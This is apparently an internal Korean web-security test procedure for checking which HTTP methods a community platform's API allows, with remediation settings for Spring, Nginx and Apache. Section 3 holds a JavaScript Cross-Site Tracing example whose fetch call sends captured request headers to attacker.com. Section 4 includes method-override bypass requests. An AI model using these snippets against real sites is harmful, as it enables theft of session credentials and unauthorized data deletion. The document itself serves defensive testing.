================================================================================
[VCE-CM-23] Client Request Method 테스트
도메인: community
위험도: Low
================================================================================

1. 진단 항목 개요
--------------------------------------------------------------------------------
VCE 커뮤니티 API 엔드포인트가 허용하는 HTTP 메서드를 점검하고,
불필요하거나 위험한 HTTP 메서드가 허용되는지 확인한다.

HTTP 메서드 남용 공격 유형:
  - TRACE 메서드: XST(Cross-Site Tracing) 공격에 악용 가능
    TRACE 메서드는 서버가 받은 요청을 그대로 응답에 반사(echo)한다.
    공격자가 XSS와 결합하면 HttpOnly 쿠키 등의 정보를 탈취 가능.

  - OPTIONS 메서드: 허용된 메서드 목록을 공격자에게 노출
    Allow 헤더에 불필요한 메서드가 포함되면 공격 표면이 확장됨.

  - HEAD 메서드: 응답 바디 없이 헤더만 반환하여 리소스 존재 여부 파악
    인증 없이 허용될 경우 리소스 열거(enumeration)에 악용.

  - PUT/DELETE 메서드의 비인가 허용: 인증 없이 리소스 조작 가능

또한 지원하지 않는 메서드에 대해 올바른 405 Method Not Allowed 응답을
반환하는지 확인하여 서버 구현의 완결성을 검증한다.


2. 대상 기능 & 엔드포인트
--------------------------------------------------------------------------------
기능                          메서드    엔드포인트
---------------------------------------------------------------------------
게시글 목록                   GET       /api/community/posts
게시글 생성                   POST      /api/community/posts
게시글 수정                   PUT       /api/community/posts/{id}
게시글 삭제                   DELETE    /api/community/posts/{id}
댓글 생성                     POST      /api/community/comments
댓글 수정                     PUT       /api/community/comments/{id}
댓글 삭제                     DELETE    /api/community/comments/{id}
좋아요 토글                   POST      /api/community/posts/{id}/like
파일 업로드                   POST      /api/community/posts/{id}/attachments

점검 메서드:
  - OPTIONS: 허용 메서드 목록 노출
  - TRACE: XST 공격 벡터
  - HEAD: 리소스 존재 확인 / 정보 수집
  - PATCH: 미구현 메서드 405 반환 여부
  - CONNECT: 프록시 악용 가능성
  - DELETE/PUT: 비인가 접근 허용 여부


3. 취약점 원리 (Why this works)
--------------------------------------------------------------------------------
[원리 1] TRACE 메서드와 XST(Cross-Site Tracing)
  TRACE 메서드가 활성화된 서버에 악성 JavaScript가 삽입된 페이지를
  통해 공격자는 다음을 수행할 수 있다:
    1. 피해자 브라우저에서 서버로 TRACE 요청 전송 (XHR)
    2. 서버가 요청 헤더 전체를 응답에 반사
    3. Authorization, Cookie 헤더 등 민감 정보 획득

  JavaScipt 예시:
    var xhr = new XMLHttpRequest();
    xhr.open("TRACE", "https://vceapp.com/api/community/posts", true);
    xhr.onreadystatechange = function() {
      if (xhr.readyState == 4) {
        // xhr.responseText에 요청 헤더 전체 포함
        fetch("https://attacker.com/steal?data=" + btoa(xhr.responseText));
      }
    };
    xhr.send();

[원리 2] OPTIONS 메서드 정보 노출
  CORS preflight 요청에 사용되는 OPTIONS 메서드가 과도한 정보를 반환하거나
  모든 메서드를 허용(Allow: GET, POST, PUT, DELETE, PATCH, OPTIONS, TRACE)하면
  공격자가 서버 공격 표면을 파악하기 용이해진다.

[원리 3] HEAD 메서드를 통한 리소스 열거
  GET 요청 없이 HEAD 요청만으로 리소스 존재 여부를 확인할 수 있어
  인증 없이 접근 가능한 경우 다른 사용자의 게시글, 파일 존재 여부를
  대량으로 탐지할 수 있다.

[원리 4] 메서드 오버라이드 우회
  일부 서버는 X-HTTP-Method-Override 헤더나 _method 파라미터를 통해
  HTTP 메서드 오버라이드를 허용한다. 이를 이용해 방화벽이나 WAF의
  메서드 제한을 우회할 수 있다.


4. 테스트 절차 with HTTP Request Examples
--------------------------------------------------------------------------------

[테스트 4-1] OPTIONS 메서드로 허용 메서드 목록 확인
--------------------------------------------------------------
OPTIONS /api/community/posts HTTP/1.1
Host: localhost:8080

OPTIONS /api/community/posts/1 HTTP/1.1
Host: localhost:8080

OPTIONS /api/community/comments HTTP/1.1
Host: localhost:8080

OPTIONS /api/community/posts/1/like HTTP/1.1
Host: localhost:8080

응답에서 확인할 항목:
  Allow 헤더 내용:
    - TRACE가 포함되어 있는지 확인
    - 불필요한 메서드(CONNECT, MOVE, COPY 등) 포함 여부
    - Access-Control-Allow-Methods 헤더의 와일드카드(*) 사용 여부

기대 응답 (안전):
  HTTP/1.1 200 OK
  Allow: GET, POST, OPTIONS

취약 응답 (위험):
  HTTP/1.1 200 OK
  Allow: GET, POST, PUT, DELETE, PATCH, TRACE, OPTIONS, HEAD


[테스트 4-2] TRACE 메서드 활성화 확인
--------------------------------------------------------------
TRACE /api/community/posts HTTP/1.1
Host: localhost:8080
Authorization: Bearer {test_JWT}
X-Custom-Header: trace-test-value

TRACE / HTTP/1.1
Host: localhost:8080
Authorization: Bearer {test_JWT}

TRACE /api/community/posts HTTP/1.1
Host: vceapp.com
Cookie: sessionId=test123
Authorization: Bearer {test_JWT}

기대 응답 (안전):
  HTTP/1.1 405 Method Not Allowed
  Allow: GET, POST

취약 응답 (위험):
  HTTP/1.1 200 OK
  Content-Type: message/http

  TRACE /api/community/posts HTTP/1.1
  Host: localhost:8080
  Authorization: Bearer {test_JWT}
  X-Custom-Header: trace-test-value
  [요청 내용 그대로 반사]


[테스트 4-3] HEAD 메서드 허용 범위 및 정보 수집 가능성
--------------------------------------------------------------
HEAD /api/community/posts/1 HTTP/1.1
Host: localhost:8080

HEAD /api/community/posts/2 HTTP/1.1
Host: localhost:8080

HEAD /api/community/posts/99999 HTTP/1.1
Host: localhost:8080

인증 없이 HEAD 요청:

HEAD /api/community/posts/1 HTTP/1.1
Host: localhost:8080

확인 항목:
  - 인증 없이 HEAD 요청 성공 여부 (200 vs 401)
  - ID 값에 따라 응답 코드 차이 여부 (리소스 열거 가능성)
    200 → 리소스 존재
    404 → 리소스 없음
  - 응답 헤더에 내부 정보 포함 여부 (X-Debug, Server, X-Powered-By 등)


[테스트 4-4] 지원하지 않는 메서드에 대한 405 응답 확인
--------------------------------------------------------------
PATCH /api/community/posts/1 HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Authorization: Bearer {test_JWT}

{"title": "PATCH로 수정 시도"}

기대 응답 (안전):
  HTTP/1.1 405 Method Not Allowed
  Allow: GET, POST, PUT, DELETE

CONNECT /api/community/posts HTTP/1.1
Host: localhost:8080

기대 응답: HTTP/1.1 405 Method Not Allowed

PROPFIND /api/community/posts HTTP/1.1
Host: localhost:8080
Authorization: Bearer {test_JWT}

기대 응답: HTTP/1.1 405 Method Not Allowed (WebDAV 메서드 미허용)


[테스트 4-5] HTTP 메서드 오버라이드 우회 시도
--------------------------------------------------------------
일반 POST 요청에 X-HTTP-Method-Override 헤더 포함하여 DELETE/PUT 우회:

POST /api/community/posts/1 HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Authorization: Bearer {test_JWT}
X-HTTP-Method-Override: DELETE

{}

POST /api/community/posts/1 HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Authorization: Bearer {test_JWT}
X-Method-Override: DELETE

{}

POST /api/community/admin/posts/1?_method=DELETE HTTP/1.1
Host: localhost:8080
Authorization: Bearer {test_JWT}

기대 응답 (안전): X-HTTP-Method-Override 헤더 무시, POST로만 처리
취약 응답 (위험): 실제로 DELETE 동작 수행 (게시글 삭제됨)


[테스트 4-6] Burp Suite를 이용한 메서드 자동 테스트
--------------------------------------------------------------
Burp Suite Repeater를 활용한 메서드 순환 테스트:

1. GET /api/community/posts/1 요청을 Repeater로 보냄
2. 메서드를 순서대로 변경하며 응답 확인:
   - GET → 200 OK (정상)
   - POST → 405 Method Not Allowed
   - PUT → 405 Method Not Allowed (또는 인증 필요)
   - DELETE → 405 Method Not Allowed (또는 인증 필요)
   - PATCH → 405 Method Not Allowed
   - TRACE → 405 Method Not Allowed
   - OPTIONS → 200 OK (Allow 헤더 확인)
   - HEAD → 200 OK (바디 없음)
   - CONNECT → 405 Method Not Allowed
   - PROPFIND → 405 Method Not Allowed

주목할 응답:
  - TRACE가 200 OK → 즉시 취약점 보고
  - 405 응답 없이 다른 코드 반환 → 추가 분석 필요


[테스트 4-7] CORS Preflight OPTIONS와 결합 테스트
--------------------------------------------------------------
OPTIONS /api/community/posts HTTP/1.1
Host: localhost:8080
Origin: https://attacker.com
Access-Control-Request-Method: DELETE
Access-Control-Request-Headers: Authorization

응답에서 확인할 항목:
  - Access-Control-Allow-Origin: https://attacker.com (또는 *)
  - Access-Control-Allow-Methods: DELETE 포함 여부
  - Access-Control-Allow-Headers: Authorization 포함 여부

취약 응답:
  HTTP/1.1 200 OK
  Access-Control-Allow-Origin: *
  Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
  Access-Control-Allow-Headers: *


5. 취약 여부 판단 기준
--------------------------------------------------------------------------------
취약 (VULNERABLE):
  - TRACE 메서드 활성화 → 200 OK + 요청 내용 반사 (XST 가능)
  - OPTIONS 응답의 Allow 헤더에 TRACE 포함
  - 인증 없이 HEAD 요청으로 리소스 존재 여부 확인 가능
  - X-HTTP-Method-Override로 메서드 우회 성공
  - 미지원 메서드에 405 대신 500 또는 200 반환
  - CONNECT 메서드 허용으로 프록시 악용 가능

안전 (SAFE):
  - TRACE 메서드 → HTTP 405 Method Not Allowed 반환
  - OPTIONS 응답의 Allow 헤더에 실제 허용 메서드만 포함
  - HEAD 요청 시 인증 필요
  - 미지원 메서드에 일관되게 405 반환
  - X-HTTP-Method-Override 헤더 무시


6. 예상 취약 포인트 (코드 위치)
--------------------------------------------------------------------------------
파일: SecurityConfig.java (예상)
  취약한 설정:
    .requestMatchers(HttpMethod.TRACE).permitAll()
    // 또는 TRACE 메서드 제한 설정 누락

파일: WebMvcConfigurer 구현체 (예상)
  취약한 설정:
    // 메서드 오버라이드 필터 활성화
    @Bean
    public HiddenHttpMethodFilter hiddenHttpMethodFilter() {
        return new HiddenHttpMethodFilter();
    }

파일: application.properties (예상)
  취약한 설정:
    spring.mvc.hiddenmethod.filter.enabled=true


7. 권고 조치
--------------------------------------------------------------------------------
[조치 1] TRACE 메서드 비활성화
  Spring Boot의 경우 기본적으로 Tomcat이 TRACE를 처리.
  application.properties:
    server.tomcat.allow-default-servlet=false

  Nginx 설정:
    if ($request_method = TRACE) {
        return 405;
    }

  Apache 설정:
    TraceEnable Off

[조치 2] 허용 메서드 명시적 제한
  Spring Security에서 허용 메서드 명시:
    .requestMatchers(HttpMethod.TRACE, "/**").denyAll()
    .requestMatchers(HttpMethod.CONNECT, "/**").denyAll()

[조치 3] HiddenHttpMethodFilter 비활성화
  application.properties:
    spring.mvc.hiddenmethod.filter.enabled=false

[조치 4] OPTIONS 메서드 응답 최소화
  - CORS 설정에서 필요한 메서드만 명시:
    @CrossOrigin(methods = {RequestMethod.GET, RequestMethod.POST})

[조치 5] Nginx/Apache 레벨에서 메서드 제한
  Nginx:
    limit_except GET POST PUT DELETE OPTIONS {
        deny all;
    }

================================================================================
작성일: 2024-01-01  |  진단 대상: VCE 커뮤니티 플랫폼  |  작성자: 보안진단팀
================================================================================
